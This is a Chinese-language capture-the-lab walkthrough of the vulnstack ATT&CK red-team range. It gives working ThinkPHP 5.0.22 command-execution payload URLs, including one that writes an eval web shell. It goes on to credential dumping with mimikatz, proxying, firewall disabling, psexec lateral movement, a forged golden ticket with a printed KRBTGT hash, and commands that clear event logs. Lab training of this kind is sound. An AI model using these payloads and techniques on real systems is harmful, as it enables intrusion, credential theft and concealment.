ATT&CK实战系列——红队实战

Posted exploitsec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ATT&CK实战系列——红队实战相关的知识,希望对你有一定的参考价值。

一、环境配置

vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

虚拟机密码

win7
sun\\heart 123.com
sun\\Administrator dc123.com
Win7双网卡模拟内外网
2008
sun\\admin 2020.com

网络环境配置如下:

登陆更改一下密码

phpstudy开启,然后记住这里一定要把网卡配置到相应的位置

网络环境如下:

二、外网打点

使用nmap对外网ip段进行信息收集

nmap -sV 192.168.135.150

有个web站点80、3306 mysql,就先从web站点下手

ThinkPHP 5.0.22 任意命令执行getshell

payload:

1.利用system函数远程命令执行

http://localhost:9096/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami


2.通过phpinfo函数写出phpinfo()的信息
http://localhost:9096/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


3.写入shell:
http://localhost:9096/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

或者http://localhost:9096/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>

打了一波发现是administrator权限

http://192.168.138.128/?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

这里就用工具getshell不那么麻烦了,内个蚁剑的编码器好像有点问题

我听说还有~师傅们留下的webshell在里面嗷

直接下载文件得到密码MD5解密


我是一个好人果断把大马删除掉,然后植入一个哥斯拉的shell搞

mysql弱口令

找到TP5连接数据库的文件

猜测账号密码都是root

三、内网渗透

上线CS

权限提升

信息收集

ipconfig /all #定位域控


Ladon 192.168.138.0/24 OnlinePC  # 多协议探测存活主机(IP、机器名、MAC地址、制造商)
Ladon 192.168.138.0/24 OsScan #多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)


mimikatz

获取用户密码已经NTLM、SID值

四、横向移动

直接用EW做代理

./ew_for_Win.exe -s ssocksd -l 8888

运行被防火墙拦截了,好家伙果断关闭防火墙

fscan扫描


MS17-010

扫描发现居然有MS17-010在win7上,虽然已经拿下这台机器了但还是试试

Psexec 横向拿下域控

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。

psexec 传递
psexec 是微软 pstools 工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。psexec 能够在命令行下在对方没有开启 telnet 服务的时候返回一个半交互的命令行,像 telnet 客户端一样。原理是基于IPC共享,所以要目标打开 445 端口。另外在启动这个 psexec 建立连接之后对方机器上会被安装一个服务。

获取凭据后对目标网段进行端口存活探测,因为是 psexec 传递登录,这里仅需探测445端口

命令:portscan ip网段 端口 扫描协议(arp、icmp、none) 线程
例如:portscan 192.168.138.0/24 445 arp 200





黄金票据

在域控获得KRBTGT账户NTLM密码哈希和SID


黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。

黄金票据的条件要求:

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

伪造域的用户名:len
域的名称:SUN
域的SID:S-1-5-21-3388020223-1982701712-4030140183-1110
域的KRBTGT账户NTLM密码哈希:65dc23a67f31503698981f2665f9d858

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。

WEB机 Administrator 权限机器->右键->Access->Golden Ticket


痕迹清理

windows

1.查看事件日志
run event_manager -i
2.删除事件日志
run event_manager -c
3.clearv命令清除目标系统的事件日志。

参考的大佬们博客:https://blog.csdn.net/qq_38626043/article/details/119141146
本文仅作靶场实战教程,禁止将本文演示的技术方法用于非法活动,违者后果自负。

以上是关于ATT&CK实战系列——红队实战的主要内容,如果未能解决你的问题,请参考以下文章

ATT&CK实战系列——红队实战

ATT&CK实战系列——红队实战

ATT&CK实战系列——红队实战

ATT&CK实战系列——红队实战

ATT&CK实战系列——红队实战

ATT&CK实战系列——红队实战